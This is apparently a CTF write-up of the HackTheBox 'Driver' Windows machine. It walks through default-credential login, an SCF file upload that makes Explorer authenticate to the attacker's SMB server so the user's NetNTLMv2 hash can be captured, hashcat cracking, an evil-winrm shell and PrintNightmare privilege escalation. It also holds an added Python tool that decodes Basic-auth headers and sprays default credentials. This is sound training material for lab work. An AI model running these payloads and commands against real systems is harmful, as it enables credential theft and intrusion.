Driver - HackTheBox
Driver Machine (10.10.11.106)
This was an easy Windows machine that offers a chance to explore the PrintNightmare vulnerability and to abuse a file upload feature to capture the NetNTLMv2 hash of a user whom we force to authenticate to our SMB server.
Recon
The port scan shows four open ports (22 is reported as filtered):
22/tcp filtered ssh
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:window
As the scan shows, port 80 is running Microsoft IIS. Port 135 is MSRPC and port 445 is SMB. Port 5985 is WinRM (Windows remote management over HTTP); think of it as the SSH of Windows, used to log in to a remote computer and run commands on it. We will use evil-winrm, a pentest tool built on WinRM that gives us a PowerShell session plus extras such as file upload and download.
Directory and file fuzzing doesn't reveal much beyond images and index.php, and those also answer with 401 or 403. The site uses HTTP Basic Authentication, which forces the client to authenticate before a request is served: the server answers 401 with a WWW-Authenticate header naming the realm (here "MFP Firmware Update Center").
On a correct login the browser sets an Authorization header on every subsequent request containing "username:password" in base64. Base64 is encoding, not encryption, and the site is plain HTTP, so anyone on the network path can recover the credentials from a single request.
As we don't have any credentials yet, let's move on to SMB.
Foothold: Capturing NTLM hash by scf file upload
SMB anonymous (null-session) login is not enabled, so we can't list shares:
smbclient -L //10.10.11.106/
Let's enumerate the SMB version using Metasploit's auxiliary/scanner/smb/smb_version module.
It reports Windows build 10240 and SMB 3.1.1. Googling "SMB 3.1.1 exploit" brings up CVE-2020-0796 (SMBGhost) everywhere, but every checker said the host is not vulnerable. That is expected: build 10240 is Windows 10 1507, which predates the SMBv3 compression feature that SMBGhost exploits (the affected builds are 1903 and 1909). At this point I was in a rabbit hole. The thing was I didn't try to log in to the web app with default credentials like admin:admin or admin:password.
It turns out the web login accepts admin:admin.
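To make concrete what the 401 challenge, the Authorization header and the default-credential check above involve, here is an added Python example written for this edit; it is not code from the original write-up or from the box. The captured request text and the short default-credential list are constructed for illustration, and the live probe uses only urllib, counting any status other than 401 as acceptance (a 403 still means the realm took the credentials).

```python
import base64
import binascii
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Optional, Tuple

Creds = Tuple[str, str]


def basic_auth_header(username: str, password: str) -> str:
    """Value a browser sends in 'Authorization:' after a Basic-auth login.
    It is plain base64 of 'user:pass': encoding, not encryption."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def decode_basic_auth(header_value: str) -> Optional[Creds]:
    """Reverse basic_auth_header; returns None for anything that is not valid Basic."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")  # RFC 7617: split on the first ':' only
    return (user, password) if sep else None


def recover_credentials(raw_http: str) -> List[Creds]:
    """Pull every distinct Basic credential out of plaintext HTTP request headers,
    which is exactly what a network observer can do when the site is served over HTTP."""
    found: List[Creds] = []
    for line in raw_http.splitlines():
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization":
            creds = decode_basic_auth(value)
            if creds and creds not in found:
                found.append(creds)
    return found


# Constructed sample of what a packet capture of the login request would contain.
SAMPLE_CAPTURE = """GET /index.php HTTP/1.1
Host: driver.htb
Authorization: Basic YWRtaW46YWRtaW4=
User-Agent: Mozilla/5.0
"""

# Constructed short list of vendor defaults worth trying before anything clever.
DEFAULT_CREDENTIALS: List[Creds] = [
    ("admin", "admin"), ("admin", "password"), ("admin", ""), ("administrator", "admin"),
]


def spray_defaults(probe: Callable[[str, str], bool],
                   candidates: Iterable[Creds] = DEFAULT_CREDENTIALS) -> Optional[Creds]:
    """Try each candidate through `probe`, which returns True when the server accepts it."""
    for user, password in candidates:
        if probe(user, password):
            return (user, password)
    return None


def http_probe(url: str, timeout: float = 5.0) -> Callable[[str, str], bool]:
    """Build a probe for a live Basic-auth URL. Only a 401 counts as rejection;
    200 or even 403 means the realm accepted the credentials."""
    def probe(user: str, password: str) -> bool:
        req = urllib.request.Request(url, headers={"Authorization": basic_auth_header(user, password)})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status != 401
        except urllib.error.HTTPError as err:
            return err.code != 401
    return probe


if __name__ == "__main__":
    print(recover_credentials(SAMPLE_CAPTURE))  # [('admin', 'admin')]
    # Against the box: spray_defaults(http_probe("http://driver.htb/"))
```

The probe is deliberately a plain callable so the spray logic can be exercised offline; swap in http_probe(url) for a real target, and keep the candidate list short, since each attempt is a logged failed login on the server.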
Let's also add driver.htb to our hosts file. Behind the login there is a firmware upload form; this looks like our way in.
After uploading any random file there, the response message tells us the file goes to a file share and will be looked at manually.
"File share" hints at SMB, which is nothing but a file share, and "manually looking into these files" means someone browses the uploaded files in Explorer. A quick Google search for "file upload exploit smb" brings up a blog post about the SCF file upload attack, and a search on ippsec.rocks finds a video about the same attack. An SCF (Shell Command File) is not executed: Explorer parses it as soon as it renders the folder it sits in, and its IconFile line can point at a UNC path. Explorer then tries to fetch the icon from that path and authenticates to our SMB server with the browsing user's credentials, so we capture that user's NetNTLMv2 challenge-response. It was pretty easy to understand from here, so let's do it.
Creating our test SCF file, test.scf (the IP is our attacking machine):
[Shell]
Command=2
IconFile=\\10.10.16.5\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
Let's capture the hash with the Metasploit module auxiliary/server/capture/smb. Run msfconsole with sudo, as listening on port 445 requires root privileges. Then submit test.scf through the upload form, and almost instantly we get user tony's NetNTLMv2 hash.
hash (the trailing blob is truncated here):
tony::DRIVER:5e438a66f72aeb2a:ea87bc8d6aa9f67fc40c654c42befff4:…
Let's crack this hash with hashcat on a Google Colab server: we install hashcat and rockyou on Colab and crack it there (you can do the same on your own machine). Colab notebook.
!hashcat/hashcat -m 5600 hash wordlists/rockyou.txt
Mode 5600 is NetNTLMv2 (recent hashcat versions also auto-detect it). It cracks to tony:liltony.
Let's try logging in to SMB with it, and it works.
Let's check whether we can get a shell with it using evil-winrm:
evil-winrm -i 10.10.11.106 -u tony -p liltony
We have user on the machine.
Privilege escalation: CVE-2021-1675 - PrintNightmare
After getting user, I started enumerating the box with the tips and tricks listed on the internet to find something vulnerable. Although it was in front of me, I couldn't spot it. Then people from Discord came to help: running winPEAS shows that the spoolsv service (the Print Spooler) is running, and it is vulnerable to PrintNightmare. The Print Spooler runs as SYSTEM, and CVE-2021-1675 lets an authenticated low-privileged user make it load an attacker-supplied printer driver DLL, which is how the exploit used here ends up creating a local administrator.
We will use the PowerShell exploit written by John Hammond.
Exploit link: here
Clone the repo, then:
- Upload the PowerShell script to the victim machine from the evil-winrm session:
upload CVE-2021-1675.ps1
- Import the script into our session with Import-Module .\CVE-2021-1675.ps1. This fails with an execution-policy error.
The execution policy is a PowerShell safety feature that decides whether scripts may be loaded into the current session. It is meant to stop users from running scripts by accident; Microsoft documents that it is not a security boundary, and for a user who already has a shell it is trivial to work around. The error also gives a documentation URL, so let's read it.
According to it we can change the execution policy:
"On a Windows computer you can set an execution policy for the local computer, for the current user, or for a particular session. You can also use a Group Policy setting to set execution policies for computers and users."
There are different execution policies such as Restricted, RemoteSigned, Unrestricted, Bypass and Default, which specify what happens when someone tries to load a script. Let's check ours.
Get-ExecutionPolicy : we are Restricted, so let's change that.
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser : this sets the policy to Unrestricted for the current user. It persists in the registry, which is why it needs cleanup later; the Process scope would have applied to this session only.
Let's invoke the script now. Its Invoke-Nightmare function creates a new local user and adds it to the Administrators group; by default the account is adm1n with password P@ssw0rd.
Now we can log in with the new credentials adm1n:P@ssw0rd, since the script added this user to the Administrators group.
And we are admin on the box, yeet!
Cleanup:
- Remove the PowerShell script from the machine.
- Set the execution policy back to Restricted:
Set-ExecutionPolicy -ExecutionPolicy Restricted -Scope CurrentUser
- Delete the adm1n user from the machine:
net user adm1n /delete
Edit: Thank you for reading; feedback is welcome. I hope to improve my Windows hacking skills over the coming months.
Twitter: Avinashkroy